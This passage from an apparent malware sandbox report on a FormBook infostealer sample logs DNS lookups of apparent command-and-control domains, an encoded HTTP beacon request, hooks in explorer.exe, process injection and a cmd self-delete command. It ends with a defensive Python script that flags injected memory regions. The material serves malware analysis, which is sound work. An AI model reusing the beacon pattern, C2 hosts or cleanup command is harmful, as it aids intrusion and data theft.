Jan 13, 2021 21:24:06.376877069 CET | 53 | 56061 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:24:07.145781040 CET | 58336 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:24:07.196732998 CET | 53 | 58336 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:24:08.151783943 CET | 53781 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:24:08.199799061 CET | 53 | 53781 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:24:09.111212015 CET | 54064 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:24:09.161999941 CET | 53 | 54064 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:24:09.951495886 CET | 52811 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:24:10.002197027 CET | 53 | 52811 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:24:11.236196995 CET | 55299 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:24:11.284121037 CET | 53 | 55299 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:24:12.289843082 CET | 63745 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:24:12.342294931 CET | 53 | 63745 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:24:13.346986055 CET | 50055 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:24:13.394896030 CET | 53 | 50055 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:24:14.592904091 CET | 61374 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:24:14.643692017 CET | 53 | 61374 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:24:15.728138924 CET | 50339 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:24:15.776109934 CET | 53 | 50339 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:24:35.984093904 CET | 63307 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:24:36.032093048 CET | 53 | 63307 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:24:40.249634027 CET | 49694 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:24:40.309444904 CET | 53 | 49694 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:24:54.042809010 CET | 54982 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:24:54.103244066 CET | 53 | 54982 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:24:56.545470953 CET | 50010 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:24:56.602050066 CET | 53 | 50010 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:25:01.855648041 CET | 63718 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:25:01.915158033 CET | 53 | 63718 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:25:04.826375961 CET | 62116 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:25:04.885246992 CET | 53 | 62116 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:25:05.572345018 CET | 63816 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:25:05.622982025 CET | 53 | 63816 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:25:06.189363956 CET | 55014 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:25:06.240117073 CET | 53 | 55014 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:25:06.947381973 CET | 62208 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:25:07.006567001 CET | 53 | 62208 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:25:07.615426064 CET | 57574 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:25:07.642710924 CET | 51818 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:25:07.671602964 CET | 53 | 57574 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:25:07.710135937 CET | 53 | 51818 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:25:08.327656984 CET | 56628 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:25:08.383883953 CET | 53 | 56628 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:25:09.497463942 CET | 60778 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:25:10.538269043 CET | 60778 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:25:10.644700050 CET | 53799 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:25:11.267458916 CET | 53 | 60778 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:25:11.646994114 CET | 53799 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:25:11.707711935 CET | 53 | 53799 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:25:12.463759899 CET | 54683 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:25:12.512481928 CET | 53 | 54683 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:25:12.983732939 CET | 59329 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:25:13.040106058 CET | 53 | 59329 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:25:39.331732988 CET | 64021 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:25:39.394530058 CET | 53 | 64021 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:25:41.298754930 CET | 56129 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:25:41.346676111 CET | 53 | 56129 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:25:42.776345015 CET | 58177 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:25:42.847879887 CET | 53 | 58177 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:26:02.693787098 CET | 50700 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:26:02.767628908 CET | 53 | 50700 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:26:23.308008909 CET | 54069 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:26:23.383419991 CET | 53 | 54069 | 8.8.8.8 | 192.168.2.6
Jan 13, 2021 21:27:04.839895010 CET | 61178 | 53 | 192.168.2.6 | 8.8.8.8
Jan 13, 2021 21:27:04.901885986 CET | 53 | 61178 | 8.8.8.8 | 192.168.2.6

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 13, 2021 21:26:02.693787098 CET | 192.168.2.6 | 8.8.8.8 | 0x38ee | Standard query (0) | www.toweroflifeinc.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:26:23.308008909 CET | 192.168.2.6 | 8.8.8.8 | 0xa42b | Standard query (0) | www.quintred.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:04.839895010 CET | 192.168.2.6 | 8.8.8.8 | 0x9d11 | Standard query (0) | www.hotvidzhub.download | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 13, 2021 21:26:02.767628908 CET | 8.8.8.8 | 192.168.2.6 | 0x38ee | Name error (3) | www.toweroflifeinc.com | none | none | A (IP address) | IN (0x0001)
Jan 13, 2021 21:26:23.383419991 CET | 8.8.8.8 | 192.168.2.6 | 0xa42b | No error (0) | www.quintred.com | | 91.195.241.137 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:04.901885986 CET | 8.8.8.8 | 192.168.2.6 | 0x9d11 | Name error (3) | www.hotvidzhub.download | none | none | A (IP address) | IN (0x0001)

                                                                            HTTP Request Dependency Graph

                                                                            • www.quintred.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49755 | 91.195.241.137 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jan 13, 2021 21:26:23.436424017 CET | 4866 | OUT | GET /jqc/?CZ=GWrWoWa4zZjFn82G+0nNh4GvWCUBG1oNYElUd01Cxs8I6tEnxSPY6FoFnAuUsLE3P+RrU5FSoA==&sv28R0=gnKTZf8P HTTP/1.1
Host: www.quintred.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jan 13, 2021 21:26:23.510871887 CET | 4866 | IN | HTTP/1.1 302 Found
date: Wed, 13 Jan 2021 20:26:23 GMT
content-type: text/html; charset=UTF-8
content-length: 0
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_T0oGji8ZbUDKitk7mvz/5w6qRssSn9oqweHEj3JMisRyq1Qoa/dizZly+qRNB2xY3VlNem/76Rnt308qbdhrGw==
expires: Mon, 26 Jul 1997 05:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
pragma: no-cache
last-modified: Wed, 13 Jan 2021 20:26:23 GMT
location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=quintred.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
x-cache-miss-from: parking-6d4775b86f-szbgp
server: NginX
connection: close


Code Manipulations

User Modules

Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Processes

Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE2
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE2
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xE2
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xE2

                                                                            System Behavior

General

Start time: 21:24:12
Start date: 13/01/2021
Path: C:\Users\user\Desktop\BLESSINGS.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\BLESSINGS.exe'
Imagebase: 0x710000
File size: 3427840 bytes
MD5 hash: 30CB872994E8A0A4A635B06BFBE38006
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 21:24:47
Start date: 13/01/2021
Path: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Imagebase: 0xb60000
File size: 42080 bytes
MD5 hash: F2A47587431C466535F3C3D3427724BE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 0%, Metadefender
• Detection: 0%, ReversingLabs
Reputation: moderate

General

Start time: 21:24:52
Start date: 13/01/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff6f22f0000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 21:25:13
Start date: 13/01/2021
Path: C:\Windows\SysWOW64\raserver.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\raserver.exe
Imagebase: 0xd90000
File size: 108544 bytes
MD5 hash: 2AADF65E395BFBD0D9B71D7279C8B5EC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 21:25:17
Start date: 13/01/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Imagebase: 0x2a0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 21:25:18
Start date: 13/01/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
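The Yara matches in the process blocks above name the memory dump each rule fired on, and that dump name encodes where in the process the hit sits. The decoder below is an added example, not part of the Joe Sandbox report or its tooling. It assumes the dump name is laid out as `<pid>.<phase>.<id>.<base address>.<protection>.<type>.sdmp` with hexadecimal fields, that the protection field holds a Windows page-protection constant from winnt.h (0x40 = PAGE_EXECUTE_READWRITE, 0x04 = PAGE_READWRITE), and that the leading index 00000008 / 0000000F is the process index of the AddInProcess32.exe and raserver.exe blocks that list those matches. `DumpRef`, `parse_yara_line`, `triage` and the `IMAGE_BASES` table are names introduced here; the image bases come from the report's Imagebase fields and the sample lines are copied from the report.

```python
"""Decode sandbox memory-dump references and flag regions that look like injected code.

Added example, not report tooling. Assumed dump-name layout (all fields hex):
    <pid>.<phase>.<id>.<base address>.<protection>.<type>.sdmp
with <protection> holding a Windows page-protection constant (winnt.h).
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXEC_MASK = 0xF0   # every PAGE_EXECUTE* value
WRITE_MASK = 0xCC  # READWRITE, WRITECOPY and their executable variants

DUMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<id>[0-9A-Fa-f]+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<mtype>[0-9A-Fa-f]{8})\.sdmp$"
)
YARA_LINE_RE = re.compile(r"Rule:\s*(?P<rule>[^,]+),.*?Source:\s*(?P<src>\S+\.sdmp)")

# Image bases from the report's Imagebase fields; the dump prefixes 00000008 and
# 0000000F are assumed to be the indices of AddInProcess32.exe and raserver.exe.
IMAGE_BASES: Dict[int, int] = {0x08: 0xB60000, 0x0F: 0xD90000}

# One Yara line per dumped region, copied from the report (three for the first
# region of process 8, to show that hits on the same region are merged).
REPORT_YARA_LINES = [
    "• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, Author: Joe Security",
    "• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Author: Joe Security",
    "• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com",
    "• Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group",
    "• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, Author: Joe Security",
    "• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, Author: Joe Security",
    "• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, Author: Joe Security",
    "• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security",
    "• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, Author: Joe Security",
]


@dataclass(frozen=True)
class DumpRef:
    rule: str
    pid: int
    base: int
    protection: int

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protection, f"0x{self.protection:02x}")

    @property
    def executable(self) -> bool:
        return bool(self.protection & EXEC_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protection & WRITE_MASK)


def parse_yara_line(line: str) -> Optional[DumpRef]:
    """Turn one '• Rule: ..., Source: <dump>.sdmp, ...' line into a DumpRef, or None."""
    m = YARA_LINE_RE.search(line)
    d = DUMP_RE.match(m.group("src")) if m else None
    if not d:
        return None
    return DumpRef(rule=m.group("rule").strip(), pid=int(d.group("pid"), 16),
                   base=int(d.group("base"), 16), protection=int(d.group("prot"), 16))


def triage(refs: List[DumpRef], image_bases: Dict[int, int]) -> List[str]:
    """One finding per distinct (pid, base, protection); RWX and off-image code are flagged."""
    findings = []
    for pid, base, prot in sorted({(r.pid, r.base, r.protection) for r in refs}):
        rules = sorted({r.rule for r in refs if (r.pid, r.base, r.protection) == (pid, base, prot)})
        ref = DumpRef(rules[0], pid, base, prot)
        tags = []
        if ref.executable and ref.writable:
            tags.append("RWX")                    # self-modifying / unpacked code
        if ref.executable and base != image_bases.get(pid):
            tags.append("exec-outside-image")     # code that was not loaded from the PE on disk
        if base == 0x400000 and image_bases.get(pid) not in (None, 0x400000):
            tags.append("PE-at-default-base")     # a second PE mapped at the 32-bit default base
        findings.append(f"pid {pid}: 0x{base:08x} {ref.protection_name} "
                        f"[{', '.join(tags) or 'data'}] hit by {len(rules)} rule(s): {', '.join(rules)}")
    return findings


if __name__ == "__main__":
    refs = [r for r in map(parse_yara_line, REPORT_YARA_LINES) if r]
    print("\n".join(triage(refs, IMAGE_BASES)))
```

Run over the nine lines, it reports three PAGE_EXECUTE_READWRITE regions in AddInProcess32.exe, one of them at 0x400000 even though that process's own image loaded at 0xb60000, which is consistent with the process-hollowing signature: a PE mapped at its preferred base inside a host whose real image sits elsewhere. In raserver.exe the two RWX regions at 0x1d0000 and 0x840000 lie outside the 0xd90000 image, while the 0xd10000 hit is plain read/write memory. Those base addresses and protections are what to pull from the full dumps when extracting the configuration the report says it found.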
